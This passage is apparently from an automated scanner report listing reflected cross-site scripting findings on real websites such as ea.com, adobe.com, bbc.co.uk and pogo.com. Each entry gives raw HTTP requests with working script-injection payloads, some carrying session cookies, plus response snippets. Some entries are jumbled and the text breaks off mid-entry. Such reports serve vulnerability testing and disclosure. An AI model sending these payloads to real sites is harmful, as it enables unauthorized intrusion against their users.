GET /games/scrabble?9434a"><script>alert(1)</script>13cdeb03797=1 HTTP/1.1 Host: word-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; op600clubpogogum=a00200200a2719m0337lk0d3e;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://word-games.pogo.com/games/scrabble?9434a"><script>alert(1)</script>13cdeb03797=1"/> ...[SNIP]...
3.556. http://word-games.pogo.com/games/scrabble [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://word-games.pogo.com
Path:
/games/scrabble
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12bcd"><a>1723ca1944 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /games/scrabble?pageSection=free_home_hot_games1_pl_scrabble&12bcd"><a>1723ca1944=1 HTTP/1.1 Host: word-games.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://word-games.pogo.com/games/scrabble?12bcd"><a>1723ca1944=1"/> ...[SNIP]...
3.557. http://www.adobe.com/cfusion/marketplace/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.adobe.com
Path:
/cfusion/marketplace/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b21e3"style%3d"x%3aexpression(alert(1))"dd69221e281 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b21e3"style="x:expression(alert(1))"dd69221e281 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /cfusion/marketplace/index.cfm?event=marketplace.home&marketplaceid=1&b21e3"style%3d"x%3aexpression(alert(1))"dd69221e281=1 HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/x ...[SNIP]... <a href="/cfusion/marketplace/index.cfm?marketplaceid=1&b21e3"style="x:expression(alert(1))"dd69221e281=1&userid=&event=marketplace.offering&offeringid=19188" class="offeringFeatImg"> ...[SNIP]...
3.558. http://www.bbc.co.uk/news/technology-12126880 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbc.co.uk
Path:
/news/technology-12126880
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b916d'-alert(1)-'0e4cca645e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/technology-12126880?b916d'-alert(1)-'0e4cca645e6=1 HTTP/1.1 Host: www.bbc.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.559. http://www.cmsinter.net/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cmsinter.net
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d83a2"><script>alert(1)</script>6e563bfa6d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?page_id=68&d83a2"><script>alert(1)</script>6e563bfa6d3=1 HTTP/1.1 Host: www.cmsinter.net Proxy-Connection: keep-alive Referer: http://www.cmsinter.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=215573381.1294526267.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215573381.1031492532.1294526267.1294526267.1294526267.1; __utmc=215573381; __utmb=215573381.1.10.1294526267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profile="http:/ ...[SNIP]... <form action="/?page_id=68&d83a2"><script>alert(1)</script>6e563bfa6d3=1#wpcf7-f9-p68-o1" method="post" class="wpcf7-form"> ...[SNIP]...
3.560. http://www.e00.peanutlabs.com/js/iFrame/sc.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.e00.peanutlabs.com
Path:
/js/iFrame/sc.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26db1'%3balert(1)//c84884515e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26db1';alert(1)//c84884515e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the userId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bf13'%3balert(1)//5aebc85affc was submitted in the userId parameter. This input was echoed as 6bf13';alert(1)//5aebc85affc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63934"><script>alert(1)</script>2df1751bdc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hasbro63934"><script>alert(1)</script>2df1751bdc4 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:34 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=q1hu6pdtvde5o6ou1i8lmndgr0; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/hasbro63934"><script>alert(1)</script>2df1751bdc4" /> ...[SNIP]...
3.563. http://www.ea.com/hasbro [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ea.com
Path:
/hasbro
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50ee5"><script>alert(1)</script>fce1739ef22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hasbro?50ee5"><script>alert(1)</script>fce1739ef22=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:52 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=0l3r07fnbqfh2m49pvb96ndld3; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 70735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a href="http://www.digg.com/submit?url=http://www.ea.com/hasbro?50ee5"><script>alert(1)</script>fce1739ef22=1" class="digg-button"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6984"><script>alert(1)</script>80d93bc71a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ipade6984"><script>alert(1)</script>80d93bc71a5 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:19 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=q40if3obhassdl2f9hct64jt97; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/ipade6984"><script>alert(1)</script>80d93bc71a5" /> ...[SNIP]...
3.565. http://www.ea.com/ipad [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ea.com
Path:
/ipad
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a8a8"><script>alert(1)</script>a817042de2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ipad?7a8a8"><script>alert(1)</script>a817042de2e=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:04 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=0pkopsdhd3jhhkf5h4g2ag3fp6; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62200
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a href="http://www.digg.com/submit?url=http://www.ea.com/ipad?7a8a8"><script>alert(1)</script>a817042de2e=1" class="digg-button"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f30d8"><script>alert(1)</script>b00c128a7a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iphonef30d8"><script>alert(1)</script>b00c128a7a2 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:29 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=2rji8o0i02qi8pf8eecrn0ktl2; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/iphonef30d8"><script>alert(1)</script>b00c128a7a2" /> ...[SNIP]...
3.567. http://www.ea.com/iphone [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ea.com
Path:
/iphone
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5498"><script>alert(1)</script>98182c329e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iphone?e5498"><script>alert(1)</script>98182c329e3=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:04 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=c37dgtcd9v5so5qc2512oda4c2; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 75114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a href="http://www.digg.com/submit?url=http://www.ea.com/iphone?e5498"><script>alert(1)</script>98182c329e3=1" class="digg-button"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d069"><script>alert(1)</script>bc71c2e28ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mobile2d069"><script>alert(1)</script>bc71c2e28ae HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:48 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=5rkhii3l0etm09hgkiup7chbu6; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/mobile2d069"><script>alert(1)</script>bc71c2e28ae" /> ...[SNIP]...
3.569. http://www.ea.com/mobile [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ea.com
Path:
/mobile
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b7f0"><script>alert(1)</script>1a57fea79e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mobile?4b7f0"><script>alert(1)</script>1a57fea79e6=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:11 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=f6h8smbmcc5eb4cfmc8shpdpp2; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 72033
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a href="http://www.digg.com/submit?url=http://www.ea.com/mobile?4b7f0"><script>alert(1)</script>1a57fea79e6=1" class="digg-button"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a510c"><script>alert(1)</script>768026e5947 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platforma510c"><script>alert(1)</script>768026e5947/online-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:15 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=r5uc24ode1odj7sfplf1so9lt6; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31141
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platforma510c"><script>alert(1)</script>768026e5947/online-games" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c71d6"><script>alert(1)</script>afd7f39634c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/online-gamesc71d6"><script>alert(1)</script>afd7f39634c HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:19 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=hdhctndthgvreqj5oc72kovrd4; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31142
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platform/online-gamesc71d6"><script>alert(1)</script>afd7f39634c" /> ...[SNIP]...
3.572. http://www.ea.com/platform/online-games [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ea.com
Path:
/platform/online-games
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e979"><script>alert(1)</script>2cc600f9716 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/online-games?4e979"><script>alert(1)</script>2cc600f9716=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:54 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=3v32m4m525g1q6qqhm6uoqlng1; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68281
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/platform/online-games?4e979"><script>alert(1)</script>2cc600f9716=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7daef"><script>alert(1)</script>8f7305031c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform7daef"><script>alert(1)</script>8f7305031c5/pc-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:08 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=dp5er2bnu8nk51e2hejgg8prt2; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31138
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platform7daef"><script>alert(1)</script>8f7305031c5/pc-games" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 978f0"><script>alert(1)</script>de071991f69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/pc-games978f0"><script>alert(1)</script>de071991f69 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:12 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=p115287m0igh5ha8rktkogt2l1; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31138
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platform/pc-games978f0"><script>alert(1)</script>de071991f69" /> ...[SNIP]...
3.575. http://www.ea.com/platform/pc-games [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ea.com
Path:
/platform/pc-games
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a13f"><script>alert(1)</script>4e0080deced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/pc-games?2a13f"><script>alert(1)</script>4e0080deced=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:38 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=i1srfdvvnrvksap1l2p9ivs9v3; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/platform/pc-games?2a13f"><script>alert(1)</script>4e0080deced=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1666"><script>alert(1)</script>0c0acabc5be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platformd1666"><script>alert(1)</script>0c0acabc5be/ps3-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:22 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=qg2f822huup33e8vdjs9ee1p80; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31139
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platformd1666"><script>alert(1)</script>0c0acabc5be/ps3-games" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ff7"><script>alert(1)</script>3d766d616d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/ps3-gamesb7ff7"><script>alert(1)</script>3d766d616d5 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
